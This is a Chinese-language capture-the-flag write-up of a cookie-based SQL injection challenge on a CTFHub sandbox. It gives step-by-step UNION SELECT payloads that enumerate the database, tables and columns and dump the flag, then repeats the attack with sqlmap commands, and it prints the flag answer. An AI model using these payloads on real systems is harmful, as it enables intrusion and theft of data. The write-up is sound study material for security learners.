开启靶场，打开链接：

发现没有注入点，猜测是Cookie注入

---

用burp抓包发送到repeater中：

先直接发送看看情况：

应该是整数型注入？毕竟默认就是id=1

---

判断一下字段数：

1 order by 2#

正常回显

1 order by 3#

回显错误，说明字段数是2

---

查看数据库位置：

1 union select 1,2#

看样子可能不在数据库中，老样子，改成-1 union select 1,2#

---

（1）爆数据库名

-1 union select 1,database()#

得到数据库名是sqli

---

（2）爆表名

-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'#

得到cxmdnrbzzo表和news表

---

（3）爆列名

-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='cxmdnrbzzo'#

得到urweetotud列

---

（4）爆字段内容（flag）

-1 union select 1,group_concat(urweetotud) from sqli.cxmdnrbzzo#

得到flag：

ctfhub{c177bd6f0e338d70e4f1e63c}

---

用sqlmap试试：

python sqlmap.py -u "http://challenge-0bf292bea88ff8cd.sandbox.ctfhub.com:10800/" --cookie "id=1" --level 2 --dbs

（注意：不设置level的话没法爆破出数据库信息）

爆出sqli数据库了

---

python sqlmap.py -u "http://challenge-0bf292bea88ff8cd.sandbox.ctfhub.com:10800" --cookie "id=1" -D sqli --level 2 --tables

爆出cxmdnrbzzo表了

---

python sqlmap.py -u "http://challenge-0bf292bea88ff8cd.sandbox.ctfhub.com:10800" --cookie "id=1" -D sqli -T cxmdnrbzzo --level 2 --columns

（其实这一步不用爆也行，直接爆字段内容，下一步就是不写列名直接爆字段内容）

爆出urweetotud列了

---

python sqlmap.py -u "http://challenge-0bf292bea88ff8cd.sandbox.ctfhub.com:10800" --cookie "id=1" -D sqli -T cxmdnrbzzo --level 2 --dump

成功爆出flag